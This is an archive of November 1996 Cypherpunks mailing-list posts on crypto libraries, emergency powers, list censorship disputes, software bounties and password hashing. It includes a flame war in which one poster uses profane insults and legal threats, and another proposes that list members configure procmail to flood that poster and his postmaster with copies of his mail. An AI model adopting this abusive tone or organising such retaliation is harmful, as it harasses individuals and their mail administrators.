one pubic key system & one private key system included.

www.homeport.org/~adam/crypto

	The tools are out there.

Adam


attila@primenet.com wrote:
| In <328E8BEC.2D76@gte.net>, on 11/16/96
|    at 07:52 PM, Dale Thorn <dthorn@gte.net> said:
| 
| ::Point 2: I've said something like this before, but here's a place where
| ::it could mean something.  If c-punks and others could divvy up as many
| ::of the supporting functions of "strong" crypto as possible, and issue
| ::them in a set of commonly-available libraries for any and all programmers,
| ::along with source code, then an application programmer (theoretically)
| ::could order up some of these libraries and write some useful crypto code
| ::in short order.
| ::
|         one of the best proposals in many years --we have all made good
|     use of library code over the years, unless the simpleton coder has a
|     obsessive-compulsive masochistic need to write an extra 20-50,000
|     lines of 'reinvent the wheel' code.
| 
|         there are several linkable libraries floating around, with
|     multiple types, etc.  the only one I looked at a couple of years
|     ago needed some extensive work on its calling and return
|     conventions --ever hear of structures?


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 17 Nov 1996 05:49:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A word on "emergencies" [WAS Re: Final Solution to the Crypto ]
Message-ID: <1.5.4.32.19961117134727.00693658@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin wrote:

>Rather, my point is a simple one.  The fact that the President has
>declared an emergency here is primarily a technical legal event.  It is
>not a sign that martial law is about to be declared, that they are coming
>to take you or your [fill in blank] away, or that anything fundamental has
>changed.  Multi-year emergencies in which the executive uses one statute
>to compensate for the Congressional decision/failure to pass another
>statute is not, I submit, a particularly telling sign of a mature and
>healthy democracy.  But this goes to large and gradual processes, not to
>anything that suddenly happened. 

Thanks for the steady-hand reassurance. Your papers are balm.

Was it not Hal's original ironic lament about the current charade -- that
it's business as usual among the jaded insiders who are confident that 
they know how power really works.

The disdain for public accountability -- cynical extension of declared 
emegencies well past their time -- is what breeds the desire of outsiders
to protect themselves from insiders. Hence, the desire for crypto, 
especially the cryptanalytic kind that ventilates those privileged inside
communications.

The battle may be between cryptogologists and lawyers, it seems to me,
the struggle for supremacy between privacy-protecting code and 
privilege-protecting secrecy.

Hoary national security proclamations have become much more lethal 
munitions than cryptography, and it is these incitements that need ... what, 
X-rating? What can be done to supplant these thrilling, crowd-
rousing proclamations of national threats -- ancient, vulgar strategems 
around the globe?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 17 Nov 1996 05:50:06 -0800 (PST)
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
In-Reply-To: <m0vOsH2-0000LkC@wittsend.com>
Message-ID: <Pine.LNX.3.95.961117083907.25183G-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Michael H. Warfield wrote:

> Date: Sat, 16 Nov 1996 16:27:35 -0500 (EST)
> From: "Michael H. Warfield" <mhw@wittsend.com>
> To: Tim Scanlon <tfs@adsl-122.cais.com>
> Cc: cypherpunks@toad.com, aga@dhp.com, postmaster@dhp.com
> Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
> 
> Tim Scanlon enscribed thusly:
> 
> > all,
> 
> > "aga@dhp.com", that 'aga' guy, is NOT subscribed to cypherpunks.
> 
> > What has and is going on is that he was blindly Cc'ing cypherpunks
> > on everything he wrote that had to do with this... 
> 
> > I exchanged some mail with the guy, he didn't understand AT ALL that
> > "cypherpunks@toad.com" was a mailing list address. He seemed to think
> > that he had to be "subscribed" to the list in order for any traffic
> > to goto it.
> 

No stupid, you miss the point.  What I told you is that I never
added the cypherpunks address to the fucking list.  And I do
not chop headers.  Get the story straight.  YOU put the address
in the header, and not me.

> > When I pointed out to him that this was not the case, his attitude was
> > that it was not his fault and that the list was "broken" etc.
> 
> > If you havn't figured it out, BELIVE ME, talking to this guy is a
> > definative waste of packets.
> 
> 	I have a suggestion...  How 'bout if everybody on this list dropped
> a procmail configuration that mailed aga@dhp.com and postmaster@dhp.com
> a copy of every message that originated from aga@dhp.com?  Do you think
> he would start to "get it" then?
> 

Look you cocksucking bastard.  If you start harassing my postmaster,
I will put you out of business.  I never put any fucking cyberpunks
address in any e-mail, so don't go blaming me.  

I have a habit of never chopping headers, so YOU had better chop
the fucking cyberpunks header at once, and stop harassing this
location!  Do you want me to sue your ISP ?  Keep up your 
unwanted e-mail to this address, and it will happen.

> 	:
> 	: - remainder of message deleted....
> 	:
> 
> 	Mike
> -- 
>  Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
>   (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
>   NIC whois:  MHW9      |  An optimist believes we live in the best of all
>  PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
> 

That is your last warning, Mike.  If you start harasing my postmaster,
I will have your fucking ass in Federal Court before you can blink.

-aga,Esq.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 23:01:59 -0800 (PST)
To: tfs@adsl-122.cais.com (Tim Scanlon)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
Message-ID: <199611171100.JAA21839@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 ðì 17/11/1996 -0600, snow wrote:
>> Stephen Boursy wrote, along with a horde of others with no lives:
>> [lots of worthless crap snipped out]
>> > None of that analogy is applicable to the cyberpunks list.
>> > When a list gets as big as that, it it no longer to be considered
>> > a "mailing-list" but it is a _public_ forum.  The whole problem
>> > here is the abuse of power by both the EFF and John Gilmore.
>
>    Boursy is a twit who has lost more accounts that Vulis.

In this case, I'd quote a poet who said
"I am not sorry for the poets who were left without an audience,
 I am sorry for the audiences who were left without any poets".

I would suggest that it is not at all a "safe" indication of personal
or intellectual _worth_, (of Mr. Boursy or of anyone) "how many
accounts he has lost".

For two reasons:
(1)  As I read Mr. Boursy's postings, I see no indication that he is
     either deranged, or evil, or lacking sanity or maturity. If he
     had these qualities, they'd sooner or later show up inside the F-K
     list, to which I subscribe for several months (nearly a year?).

(2)  The situation inside the "less official" side of thje Internet,
     at the moment (aka mailing lists) is so notoriously repressive
     that perhaps a _minority_ of mailing lists do not indulge in
     so-called "forcible unsubscriptions". E.g. what about the "Orgonomy
     mailing list" kicked out an eloquent critic of its owner (Dr.
     Demeo) (can find all names and details if you like) just because
     he opposed Dr. Demeo's "experiments" in an Israeli desert which
     (allegedly, according to the critic) resulted in people's deaths.
     I mention this case, because I was present there, and because
     (just like the "Cypherpunks" list) it was directly or indirectly
     related to issues of Freedom ("Orgonomy" being the "Alternative
     Psychology" of a rather unconventional thinker called Wilhelm Reich
     who died in an American jail after the McCarthian State framed him).




>    Ignore him.

It is not ethical to send such strong negative _injunctions_ to masses
of people and also to strangers (the 1900-strong members of the cyberphunks
list for instance). Because, you may or may not have strong reasons for
believing you are justified in such invalidation, but more than a 1000
people are now _told_ by (self-appointed) "experts" such as yourself what
and whom to ignore or to believe. (Like sheep led to the slaughter)...

This was my objection also inside the F-K list, for _some_ of the postings
in the past, but none of these postings was connected with acts of
censorship, or with "sweeping generalisations" without evidence. On several
occasions that I searched and found who or what they were talking about,
I discovered they were talking about people whose activities were indeed
horrifying (forged cancellations etc) and who also fought back.

But what you are doing now, extending the "1-person-blacklist" to your
number-two-entry (Mr. Boursy) is exactly the thing that I hoped you might
avoid.


        First they kicked out Dimitri Vulis.
        
        Then they slandered and kept out Steve Boursy.
        
        Then...
        
        When they came after me, there was nobody left to support me.


(You can perhaps realize what this paraphrase is about)... :-(


Sincerily, and with... Sanity of Mind :-)
George Stathis








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 17 Nov 1996 09:09:16 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: AGA'S LIMITED VOCABULARY
In-Reply-To: <Pine.LNX.3.95.961117112938.2235C-100000@dhp.com>
Message-ID: <Pine.SUN.3.91.961117085451.3816B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks and others,

On Sun, 17 Nov 1996, aga wrote:

> Hey stupid motherfucker, you still have the cypherpunks mailing
> list in the header.  Don't you know how to listen?

Sorry, what was that you were saying?  I wasn't listening.
 
> And ai am telling you that you get no more responses to any
> commo with the cypherpunks list in the header.

Promises, promises.
 
> no stupid, as I told you, I do not chop headers.
> I just will refuse to reply to you any more.

OkeeDokee.
 
> You will have to contact the Law Systems Institute for the
> answers to your questions.

Yeah, I kinda thought you were just blowing legal smoke.

> no more stupid fucking cypherpunks list, PERIOD.

Gawd, do all of you (titter) "Freedom-Knights" have sychronized
periods, or what?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 17 Nov 1996 09:20:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: A word on "emergencies" [WAS Re: Final Solution to the Crypto ]
Message-ID: <199611171715.JAA20014@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Professor Michael Froomkin penned, amid the "freedom knight" noise:

<snip>

>my point is a simple one.  The fact that the President has
>declared an emergency here is primarily a technical legal event.  It is
>not a sign that martial law is about to be declared, that they are coming
>to take you or your [fill in blank] away, or that anything fundamental has
>changed. 

OK, let's fill in the blank. Gun. I have heard noises that sound like you wouldn't mind this, even though I am totally peaceful and would never want to shoot anyone absent extreme provocation (such as armed invasion of my home). The way I see it, martial law could be declared at any time, or it could slowly be declared now, which I think is happening. Checkpoints and house-searches for drugs and drunks are to get us used to checkpoints and house-searches for guns and unauthorised crypto. This is only my opinion, and I fear revealing my identity publicly because people with guns are starting to get used to hiding our emotions if we are peaceful and harmless, like me. I rarely even go to the range and practice anymore (2-4 times a year). I can imagine my kids feeling the same way about sending messages with strong crypto protection.

>Multi-year emergencies in which the executive uses one statute
>to compensate for the Congressional decision/failure to pass another
>statute is not, I submit, a particularly telling sign of a mature and
>healthy democracy.  But this goes to large and gradual processes, not to
>anything that suddenly happened. 

Why am I thinking about boiling frogs now?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 17 Nov 1996 10:42:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Exploring hooks in MSIE
In-Reply-To: <328E80BC.FF@redweb.com>
Message-ID: <961117.092500.5F7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, Dietrich_Kappe@redweb.com writes:

> A little bird told me that MSIE has Javascript hooks that allow a site
> to check whether all Microsoft products on a client machine are properly
> licensed. Has anyone investigated the Javascript (err, Jscript)
> implementation in MSIE to see if this is true?
>
> The same little bird told me that MS is building some use of this
> "feature" into their Websites. Can any MS consultants corroborate on
> this issue?

I might have some insight on this after Thursday's afternoon outing to
the Microsoft Web Builder Workshop.  (for those who haven't heard, MSoft
is offering a half-day seminar with major swag... for $89, you walk out
with NT 4.0 server, J++, FrontPage and every instantiation of MSIE)  I
expect to learn some interesting stuff.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMo8vsxvikii9febJAQGpVAQAnbsa/4+dLKS4hdiOoiDXos76MK/b6lAD
6vHPq69tND9cqVCm24MZz1PbfS4VIY0HoTHiMLgBdgyRtfHW3buipC008uRTUZWH
IS2T2zgxW7MB4IfctKjl5s94JqOSmmn545rJy3K+Ii3ELOqTpqlXsUX6LJMba8De
WzCXyjU9a50=
=gMOu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 17 Nov 1996 09:26:52 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Crypto Bounties: Another Thought that crossed my mind.
Message-ID: <v02140b04aeb4fae78e96@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Eric Hughes gave a two-part presentation at DEFCON IV, which he has
subsequently polished up, that addresses: 1. ways to implement a Universal
Priacy System that enables simple and anonymous data hiding using the
existing Net facilites, and 2. a system of intellectual property
distribution and funding which is based more closely on models used in
Hollywood (e.g., completion bonds).

Eric, what's the status of your proposal?

-- Steve

>Here we go again:
>
>      There are is a lot of software that we would all like to see
>developed and deployed right?
>
>      There are a lot of people out there who write code, sometimes
>even freely redistributable code, but they have to eat, and get their
>net access right?
>
>     Well, I was thinking, what if a "Crypto Software Bounty Server"
>were set up, so that someone could propose a tool that they would like
>to see, along with an initial bounty. Others could contribute toward that
>bounty (anonymously if they wish) until either the tool was delivered.
>
>     The original issuer sets standards for the software (i.e. "easy to
>use interface to mixmaster remailers for Macintosh", then must define
>easy to use; Software considered delivered when in [alpha beta late-beta
>&etc.]). The first to present software meeting these qualifications gets
>the bounty, with the caviate that the software must be either gnu-copylefted,
>or some similar "free use" copyright, after all, "The Net" paid for it...
>
>     Some of the problems (and potential solutions) I can think of in this:
>
>     1) Refusing to honor the contract--Maybe when a project is proposed,
>        some other people (for a small percentage of the total) sign on
>        as judges. When they feel that it reached the stated goal, then
>        it is done. -Or- Money put up is non-refundable, and the bounty
>        stays in the "bank" until claimed.
>
>     2) If the money stays in the bank until claimed, people might not
>        put up that much (or enough) to make a specific project worthwile--
>
>        This could be solved by allowing the "bounty" to lapse in one
>        of 3 ways:
>
>        A) <x> length of time after the initial proposal (bad because
>           i) someone could already be working on it; ii) bad because
>           other people might add to the bounty, so a potential programmer
>           might not start until the "pot" has grown to a certain level.
>
>        B) <x> length of time after the last addition to the bounty,
>           bad for both i & ii above.
>
>           These can both be gotten around (and other problems) by allowing
>           programmers to "register" with the service that they are working
>           on a project (either anonymous registery, so that people will
>           still contribute to the project, or list those registered so
>           that people know [if who] someone is working on it)
>
>     3) Funding: The server (in both the machine and the organizational sense)
>        could be funded by:
>
>        A) Interest on the money accumulated.
>
>        B) A percentage of the bounty (say 10%)
>
>        C) Both A & B.
>
>Has anything like this been proposed before? I know that the FSF (IIRC) accepts
>contributions, but I am thinking of something more targeted, more "market
>driven" if you will.
>
>This could be expanded to non-crypto software as well, just think, if half
>the X Window users ponied up $5 a peice for a "good, easy to use non-motif
>word processor", how long do you think it would take for someone to start
>coding a MS Word killer?
>
>Comments?
>
>
>Petro, Christopher C.
>petro@suba.com <prefered for any non-list stuff>
>snow@smoke.suba.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 17 Nov 1996 06:35:40 -0800 (PST)
To: deviant@pooh-corner.com (The Deviant)
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.94.961117141454.2208A-100000@random.sp.org>
Message-ID: <199611171432.JAA02213@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
| On Sat, 16 Nov 1996, Joshua E. Hill wrote:
| > 	I'm trying to think of a function to replace UNIX's crypt(3).  
| > My design criteria are as follows:

| Why? UNIX passwords with password shadowing are as secure as any password
| system is going to get.  If your security holes are with passwords, its
| because your admin is to lazy to install needed security provissions, not
| because the system of checking passwords is bad.

	A longer salt would make running crack against a large
password file slower.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 23:51:37 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Does John Gilmore...
Message-ID: <199611171150.JAA23268@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 ìì 16/11/1996 -0800, Sandy Sandfort wrote:
>C'punks,
>
>On Sun, 17 Nov 1996, George A. Stathis wrote:
>
>> What worries me is that people still subscribe to the
>> cypherpunks list after this assault on free speech takes place.
>
>So I guess we won't be seeing George around here any more (or 
>did he just me OTHER people should unsubscribe?).

Rest assured that... I am not subscribed to your list anyway.
Maybe I allowed 5 or 6 messages to reach you, since the 'recipients'
contained your list in the first place.

It's part of *your* attempt (AFTER Dimitri's expulsion) to "have the
last word".  :-)  - NOT mine! :-)
 

Perhapds I'd subscribe to your list if serious discussions on...
crypography take place, which would enable me to better... protect
my own software by some kind of encryption. But I decided to lower
my prices and publish (my dictionaries) unprotected anyway! :-)

As regards 'PGP'...
I don't give a damn anymore who reads my mail, since I got used
to infringements of privacy anyway (since my childhood days in
a dictatorship).

In any case, It is not my style to 'hinder other people's discussions'.

And if a list contains more than 1000 people INDIFFERENT to Freedom
of Speech, it's not AT ALL 'my' kind of list anyway... :-)





>> ...I would gladly write articles on Dimitri's expulsion and the
>> facade of Free Speech in mailing lists etc.,...But since I have
>> no time, it's likely someone else will report this.
>
>What was that from Thomas Paine about summer soldiers and
>sunshine patriots?  Three cheers for George and his commitment
>to "Free Speech."  I know I'm impressed.


Aha! aha! aha!  :-)

You are on the verge on "taking the piss out of" (even) Thomas Paine!

How has it happened that you are so determined in your anti-Vulistic
zeal, so as to sacrifice even what the rest of the World admires in
your country?

I always liked Americans for their support of Individual Rights,
their Constitution, Jefferson and Thomas Paine, things like that...

Well, if you want all these reasons to vanish in thin air,
good luck in your next... forcible unsubscriptions! :-)

<shrug>
George

P.S. I have heard cynical Americans before, being 'sarcastic' against
     selfless supporters of Free Speech. A lot of you people can't
     even imagine a selfless cause without financial gain. Such is
     the... Mafia world of... pimping and prostitution, I suppose... :-)     
(-joke!) ROTFL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 17 Nov 1996 09:55:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Unsubscriving Briefly
Message-ID: <199611171754.JAA21558@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm unsubscriving from the list for a few days (weeks?) until the 
noise level drops down a bit.  I'll check it periodically on the Web
and I'm pretty sure that if something happens that shakes the world
of cryptography to its very foundations, someone will probably send 
me some email about it. 

Please continue to party while I am away. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 00:16:37 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore...
Message-ID: <199611171215.KAA24079@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 ìì 16/11/1996 -0800, Sandy Sandfort wrote:
>> ...I would gladly write articles on Dimitri's expulsion and the
>> facade of Free Speech in mailing lists etc.,...But since I have
>> no time, it's likely someone else will report this.
>
>What was that from Thomas Paine about summer soldiers and
>sunshine patriots?  Three cheers for George and his commitment
>to "Free Speech."  I know I'm impressed.


You mean that if I launched an entire publicity campaign against
the censorship of Dimitri Vulis and similar evils, I would not
thoroughly enjoy it, or not get paid the newspapers here, for it?
(the standard rates per column)?

Poor soul! :-) What you see as 'voluntarism' or 'sacrifice' is
in reality quite the opposite. Which is why...
NOT writing about it is an act of generosity, NOT the other way round.
(Which is why I'll make sure SOMEBODY writes about it).


Tsk, tsk, tsk
George





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sven <sven@loop.com>
Date: Sun, 17 Nov 1996 10:37:35 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
Message-ID: <199611171834.KAA14867@patty.loop.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3948.1071713642.multipart/mixed"

--Boundary..3948.1071713642.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


>> 	I have a suggestion...  How 'bout if everybody on this list dropped
>> a procmail configuration that mailed aga@dhp.com and postmaster@dhp.com
>> a copy of every message that originated from aga@dhp.com?  Do you think
>> he would start to "get it" then?

Why are these people so uptight?

Sven


MOSER016.JPG

|__
   |--> SVEN: a.k.a. Chris Blanc
        Internet consulting/Web design
		
		[ http://www.loop.com/~sven/ ]

Some only sample the dark wine of life's blood...

--Boundary..3948.1071713642.multipart/mixed
Content-Type: application/octet-stream; name="hqx00000.hqx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="hqx00000.hqx"
Content-Description: ""

CihUaGlzIGZpbGUgbXVzdCBiZSBjb252ZXJ0ZWQgd2l0aCBCaW5IZXggNC4w
KQo6JCVlMjhkOTUtJCVmLE5UMzRgIiM1OGoiRUA0W0ZgISEhISNUSiEhISEh
JFRCSXJCcnEhISUlVCc1OEIhITMlCiEhISUhITMhIXJwWCEzYCEpIkpCKCJK
OCkiYEYoIzNOKSNKYDgkM2AsI2BgQyVLLTImImREKGFpRydLYEYpIzMKWipi
IUwsIy1GKCNKaCs1YGAtNjNkMCJtUjE2ZGktTWBaLWMzYnJwWCEzYCUqIzNO
LSNgYEIkM2RCLUwlRik2KQpiLU0pYi1NKWItTSliLU0pYi1NKWItTSliLU0p
Yi1NKWItTSliLU0pYi1NKWItTSliLU0pYi1NKWItTSliLU0pCmJybSEhJTNK
ImYhKnAhYCVMISEpNCEzLTQhSXIlISJgISEhKSQhMyUiITMhISEhISEhISEh
ISEzJiFKLSchMyEKKCMyciUhJikzISEpIiFKMyUhYDMpIWA4JyFKSiUiYCUj
IWAhNCIiKUstMzhMMzklNkJJISctUiciJiMwIzhUJwpLWEYlY0JZJShGUyxL
bTQ4ZE5VK2JkTjBNJkwzZTBQMGNYbSlBNCg0ZTkmOVBKajE4aVtyJSEiTiIh
IS0iITMlCiEhISEhISEhISEhISEhISUjIWAhJSJJciUhI0Y0ISEpIyFgISMh
MzMkITMlIiEhISEhISEiIUslJCk2JTUzOSUKJSViKksmJCphTkIoYHJwUyEk
IS0iISEpNCFhJSEyYCEyJGlCYmEiYWxUMFhQMkYwSzMtLSJGJGxlcGshYFJL
cQonMDkiQUhNKkZAVVMlTUVAcEhJWmNZQSFwJzMwR2xtW0RMbSlKYStZMClF
JEJIRytQUSJMQHFwcEcrW2BaKUJVCiEkUFowMEVAVkRwTSxFMCFOUyNWKCUs
REEkJ1RZS1hEOUQ5aiFUKlotWSNpQSUiI1ItWXFUVFEtQ0tAOUxwaFsKZUJl
J0ZyYCImOFtKNEJZLXFHQCtYLHFwaFQ0TC0xZEIqOFghIlVQRDIoIyJKY1VU
JmNYNDVmQyZEcmAjOWtlcQpjMSlKTiNbJ0JROEEqW2JlUmpxJlswKWhLbE1s
YVZAY0JCMTUzIStpWWhVVDlNOCY0JVRGaEEtZTIjRy05YWRJCjJqcShiM1U0
KUtla01ETk5kLDMxRmVWKERlSTYqcShCZWxDVEJTZFowKiwjWHJgIThwUmZi
Q2QlQ0JJRydQRzgKRlBSMGlZRS1lIzZCQGRickQmLW0wUCpCRUc2REomYGRa
KEUsKSRtYTREVkVVRzFwI0UoS1RNTCdDNWBiTiUjUQolJmI5OU1FOEFUOUpy
aUJAZWJIcDBYKzUqbVlLRidrZWMycCg5KENTU1ZKKCtGWXJaZUMoKigjODly
RydlVSRECkEqSWw4SydQW0s5KmEmYmBtJTFicCJxcDVFZjk5VktrQDQhQyIm
WmEpYmtlTDJEIy0zNlAiVFU2QFVSUUVgTGAKMVBZRGFyJ1ZQS1ZTNURbI0xA
QGFFS0UnRGMnYCZEMiMwcEFCRGVRWDJyJyZELCJWUCEpZFVOTCcyU2ZLTSJL
ZQomYzRORSMtRFlTRWhTJypMVSVBYyRwKytLYi0jVEJWRVNIUlY1TjYxWjAw
Ik44YiFLTFNycSdUOGslZEJRKU0tCkg5QyEhQ2UnUFtBYVRJJ2RETiEiIidg
cWZFSFZlSSc4WFUqUjJhZWxyITAwVWMrKnIhZE1QITgnOEZiTWhyQWEKVWQ1
IjNISWE2ZGIjcFUkQDlQQU5NQGFyY1UtQ0MoLU42IUAwWUhlI01GazAtMWth
ITAmbFQmbDhFaVViSk4hIQpYMzBrOTQ2RGhOSStrbE1aRDBLTlgsbExoSFBV
TTkzSSU5Qk0xMDNHJ1NOY3ElRk1GY2RVbUExcVFlVSlNQzQpCihbY3FHKWxC
bURwImImVmpSMVMqciNWUCJkKmVTOFojISZkVWsmSiYnRTZZSEszY0UjNFtF
Y1ZVMFRRQVY5K1IKRGVMMitWRy1gIjFmaFI0WksnTVQraCJmMGtpVU0rRzVF
bFFwSClbU0dFRWUlaDgnYWQmK2RaSlQmOFlmOWBHJApsZmVDRWZkYzVIYlZo
MnJqazJya0ZlRGIzISMtViVsJTlSW0RIJDBsMDVhckRxUGEock5QVlNgSWYx
SWtUVmxJCnIhIXFEM2FBQkdFSEdEKycqQCNqRnFoVmVyQFBySkglaEhNUE4j
VlA4RSRUNmJrRkRIS1pWKUtbVEZEQFNUQyEKISgsRidpVCEhYTVYcSsiKmJr
cERCNGImTWgqbDkyUWFOS1QocEhiVTBlVFpTS2BkKUg1RGwkbFkpKUEjIUow
QgpwREJpQiJWQ1ExQVs4ZmtHUDhQbSJtUTJMW1hwcjFQcSlhaWVmRUY4SFEl
S1JLKTZGKEJbNXFJS2JLbVY0WiJGCmxkVkdrQnAwbSFoUjlQMkBQSDFgTDYs
R0crQjZpImkkUkFhLVtONjlAQDUzJS0sVGVYWUMxWiFESVhhKCZxKEEKTVg2
RiQ4J1hhLEtbJDlRWUlwK3FSQlYiVkNbVW1yQkdrNGNtJkUmQThCJlNRI2hk
QnJaRGtYQDZqMUUqJlhgRApKS2FjOUUtWVpEUUgwaTRMWDAsR1gwK1UlRU5E
OCltNCMoQGpxcVlHME5EU0smYlgwclI2KCRbQnFJUDVrJUBBCmpkYGBlUWYm
VUstWSFFaUhsIjUiRVk2SSM1a1RHRUdENmBaOTg0cEQyS0dMVHFtIlQ4NlZM
ZkQ2I2NhVXBRZVoKMyElQHFHLXIlTVtRMi1UayRbNSwjKkQmNWlaZWstMGBa
RmpaZTVQWFVSVWZHUmFyS2NLYDJQZFQmYVZMKUgqZAopakxZMFRLJSdjLGMi
NFpaYVYqcWQrKyZtRGMrNStEIzlmNlIsVE5oMURCTkVOZGtgU1gmamNUNTBJ
aUpxMDJGCilGVVRUQTVjUExwTSMtJllIQkg0VEtLUmJOISQwRk1pZCYmJTUw
MWZlJ2lHNSYsQHE5KjRlNEJIVUtOOGpZWk0KRTg0KFIrQ0VASVRlZlMxKSss
LUZrTmRHJikxVGRZZlMkKzRHJCwpZWBrbCdoK2VscVlEMktJMidHI1lZYERB
NAoyUE5qS0JJI0xOISREcFk4bVVjKFgxYHEqRCpsVWoqbWssLWJiSGtSMnBx
TlVYTFpBTSlYR2VoVE0mMChpQiJMCkNNRVs1WSI4W0UnJUZpQ0VYWkpxY2Ym
QSQnInEzIShBVjVhQDBgI2ZCKFlkU0tBRDAsUFZNVVpwLDQ5NSMnSmMKNSVt
YUJsa2UyK0JAWkpicTMhKyctbFhFQ1hTcjVWTUZWU3BsOU5bTlFiOWZRWVJb
UGxmVmFMKTZoVmVpQ3AhVgpDOTFRcEdDRTBQIVttRGMzWmJQYFNYIlAiMWBT
QDlOOE1hNFEiKCszZVkrMEVRKWRobDk1YEwsJS1HWTBrYChYCnFJYTZYVVgm
MDZNLGI1Sk5rTVFUQWBaSEA4IkMhRlNrUVI1U0VBVWNZRzEiRmstOE5bRWEs
bDhBJidFUitTWTMKWihMZCwyYyRlWzRGOFBUYFUnaEBTWmJVMyEtbSpLVCpW
bEtJWzhILSlTIkBxRkdYWThCRGk5RURAWWRUYyIpWApKK2IqQnIjVDVFU1sm
QCtGNEotYCo4ZixFOCltJFRaLE1ZQE4rJGwpJlVVTmBrMkhrJEBTcTYrKytT
Ym1mJUg1Ci1LMVtEVSpYJWVYajRyJidjZVRTbTEmQ05JRmtMVGMzKUI2RkUj
TWpKSDBHMlFkTSFpVTRDNWM1TVVIOElLMzEKLFFtKVFrI2hwa1JILWBVW2Em
YVBialVTUWlGUSkqSmJVWFlwLFUwRGspYlZUI0gwcU0rQkw1MiYrOVlCciRE
UApYQ1ksUDBWVmRUW2E2SlslLSQrZFNLRWBsRFBIRE5GYyYqQUJZVjllNmk0
WlJgR0JIOEAnQUhRSCQyMlIpISlxCmNoVjFCQEkrRVBZMVkxWihYQSwtQ0ZT
cWNqZE05Jmk1KERZUkdlOXIkTSJoW0RVJCk4YygpQEFIVilmTSVAOCkKI1RV
VTFEbUU0a2hoVUBWK2Y4QlMtYkolSCdWOVFxLUtbIigsRkdxZTIqVFhsQChh
ZWVUMGEzVW02aiRIVWA5JQpYUWwlZiZFLDFZRDYkQG0tSEdDTCVJQCNZLEsq
Jy1ESig1VWJpM0tkQ2BLSiEjLEFTUSslREEyLDNwYyEsUG1lCmNlU1UqSmJo
JEpHVTMhMUs4QDRha04hI1FrckdsOEUjJiQlLUVwRysjMzImKlNFaG1VLE1E
